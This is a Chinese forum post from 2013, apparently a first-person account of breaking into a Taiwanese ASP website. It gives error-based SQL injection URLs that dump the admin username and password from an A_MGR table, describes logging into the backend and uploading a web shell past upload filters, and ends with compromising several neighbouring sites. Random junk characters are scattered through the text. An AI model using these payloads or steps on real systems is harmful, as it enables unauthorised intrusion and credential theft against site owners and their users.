发现一个注入点2 t G0 m i( C0 P
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
7 S7 h7 d A. Q6 f# I; F% X+ P. t2 k& h5 v2 c/ I
习惯性的加’having1=1--
' s% Z" O3 C8 Q0 J" d# O) k- R \& l' y# k0 c/ I
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
( I* h8 o" p% x9 Q6 }- x2 z: {3 c' H* `; s
0
& t# G) S+ d6 r7 Y$ d3 K( V( w8 q
- r( U0 B/ z* Y- v# `* i爆出Diary_A.dl_Title(这时候很激动啊)
2 M2 ]5 n3 x# a/ l& ]1 _' e0 k9 M4 \' |/ }- s% f: _
那么继续
+ X F* e+ U% j$ _3 |' L% _http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
- y* [) M. c2 v" x+ O$ {$ D% O5 }- l& G$ |& F' K9 t
继续,一直爆下去6 X \' L8 @' a9 `# I8 Y/ o, T! s! O
1 T; {. r9 m+ p7 j* A, h. m
爆到几个字段和表段 但是没找到需要的管理用户的字段; R9 k% j, }' E4 Z) H$ O8 u& M/ w
5 N4 |$ v0 ?$ c. D$ F$ E
蛋疼了 怎么办 然后去后台登陆页看源码$ ] j6 p% ?5 s" ^5 g
! ]8 \+ Y0 q+ g: X# m- }- _7 E05 D$ x. `1 u2 p ?; G+ F
6 X5 v. w4 ^$ {
Input name= “ADUID” p! C8 e, C% u( h
Input name= “ADPWD”# _; r% W- e& l* p
3 N2 y) t2 Y/ B8 J; U* x很幸运 找到了字段那就继续
' d3 }2 C; L! _找到之后开始爆用户& {# |" T+ H2 n$ U8 E7 p
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—4 a8 ^8 K. ]+ B3 i) k
爆密码
$ T2 `! a; L% }! L- Nhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
; ]/ B6 u9 C/ X$ D/ T9 j测试了下 这个注入点只能爆到文章哪里的表 / s7 W5 g1 W, x: h* M" A; w/ ^& M
3 y2 T. @# ^$ z6 e4 f! U头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
/ i7 h/ J# y! {) J4 D, r: F
7 l/ u# Q: _9 I! B) G又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了& v3 z$ k1 V& x
6 f% ^& `2 ]- {" u1 [( m7 Z
473
! P }. l0 \4 S8 ]7 J2 u$ S5 C3 z1 } _0 o, i7 D
进后台
; u" F7 D3 w. C: g) b/ f& k
) m- p y7 Y$ L* z0 a& P9 ?0 l0 _+ E# q+ [
发现几个上传点 有的地方不能上传 而且防止恶意代码
3 K+ u0 Y) V5 V+ G- }! |, K# @3 q; M: J4 o$ n4 d
没办法 各种百度各种找大牛 找到一只好像可以突破的马
/ u6 y3 D: P# t; W ^5 f" C- @4 n) Q
L# r) ]' v2 Z9 \% P3 {" {在系统管理那里直接上传 不过没有显示地址+ t- r1 [- I5 F) C) ^6 Y
1 N3 R2 T4 k5 z, |
再上传一次 抓包 搞定OK
/ f3 f5 H7 Y, z; v3 l( M- V- y8 \, r$ J1 G w
' V. D$ l8 w4 e. N ~$ Q
2 s9 q5 C6 y1 V' N3 y* _
472. [ w' Q) r* j- F0 P4 M& ?
; L2 B/ a5 _/ F5 s' Q6 N
晚上不行了 去睡觉。。。3 b% W; L5 ~+ S4 C6 u [
第二天刚起床 闲的没事做继续日站吧
' A1 D. w% X! `- s
* c, c. A a0 X B找个站 就把这个站的旁c扫了下" V) r& Q- i* m6 T* D
' w! q& [ A9 a) n% D发现c段也有一个购物站 ,然后还和这个站的模板差不多: k5 U: o& A* y" F5 G7 J$ F; \5 V
0 F8 [9 g: V: K L6 H, k% d就找到会员登录口测试; D' d5 p2 s, s3 l2 }- T9 _( k3 q% Q h0 Q
5 r4 o: a3 E3 ?, N- A
'and (select top 1 MGR_UID from A_MGR)>0—
- T# G x3 \9 i$ i8 L% n% t; Y( }& `果断爆到了 这时候我很激动 通杀
$ A; U% v2 e+ ~4 T, K" U) K( v& O, ?- b' v! f
再次翻c段
4 _' T4 z- ^) Z% |; U9 u- |
/ @2 z' l4 ?( p翻出几个站 都成功拿下- ]$ }9 F) N5 ]/ U% J
Q) g8 i1 b5 `. [
, I% g8 {- X8 b- F+ B* F+ J& G
; Y0 c0 |$ Z4 S2 b" n' z- \; k
修复方案:
4 A( y R, L9 f0 s+ B他们比我专业 & d* ^& p8 `. t" J: d3 O
( X2 ^, e' h# `% j( k5 X
' T( i! y$ b2 S r0 L% Z8 x! Y. H; k! @- A" n& K
|
发表于 2013-4-4 17:40:38
收藏
支持
反对